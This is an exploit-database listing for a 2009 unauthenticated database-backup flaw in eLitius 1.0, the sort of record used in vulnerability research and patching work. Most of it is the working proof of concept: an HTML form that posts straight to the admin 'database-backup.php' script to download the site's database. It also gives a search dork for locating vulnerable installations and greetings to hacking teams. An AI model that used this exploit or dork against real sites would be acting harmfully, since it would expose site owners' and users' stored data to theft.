header-logo
Suggest Exploit
vendor:
eLitius
by:
ThE g0bL!N
7,5
CVSS
HIGH
eLitius 1.0 Remote Database Backup
N/A
CWE
Product Name: eLitius
Affected Version From: eLitius 1.0
Affected Version To: eLitius 1.0
Patch Exists: No
Related CWE: N/A
CPE: a:esyndicat:elitius
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Powered By eLitius 1.0 Remote Database Backup

eLitius 1.0 is prone to a remote vulnerability that allows attackers to download the database backup. This vulnerability is due to a lack of authentication in the 'database-backup.php' script. An attacker can exploit this issue to download the database backup without authentication.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

 <title>  Powered By eLitius 1.0 Remote Database Backup </title>
<form action="http://esyndicat.org/admin/database-backup.php" method="post" name="adminForm">
  <table class="admintable">
  <tbody><tr>
   <td style="width: 40%;">
    <table class="adminform">
    <tbody>
    <tr>
     <th colspan="2">Backup MySQL Database</th>
    </tr>
    <tr>
     <td style="text-align: center;"><strong>Choose Operation:</strong></td>
    </tr>
    <tr>
     <td style="text-align: center;">
      <select name="db_op">
       
       <option value="data">Backup data only</option>
       
      </select></td>
    </tr>
    <tr>
     <td colspan="2"  style="text-align: center; width: 50%;">
      
      <input name="savetype" value="client" id="db_client" checked="checked" type="radio"/><label for="db_client">Save to your PC</label>&nbsp;
      
     </td>
    </tr>
    <tr>
     <td style="padding: 10px 0; text-align: center;"><input type="submit" name="backup" value="Create Backup" /></td>
    <tr>
     <td colspan="2">&nbsp;
     </td>
    </tr>
    <tr>
     <td style="text-align: center;"></td>
    </tr>
    </tbody>
    </table>
   </td>
   <td valign="top" width="80%">
  <table class="adminform">
   <tbody>
<th colspan="2">Greets: Dos-Dz TeaM SnAkEs-TeaM H4ckF0rU TeaM  Team Sobh4n ALLAH</th>
    <tr>
</br>
    <th colspan="2">Dork: Powered By eLitius 1.0 </th></br></CENTER>
</br>
<center>Cod[3]d By ThE g0bL!N</center>
</br>
    </tr>
    <tr>

# milw0rm.com [2009-04-20]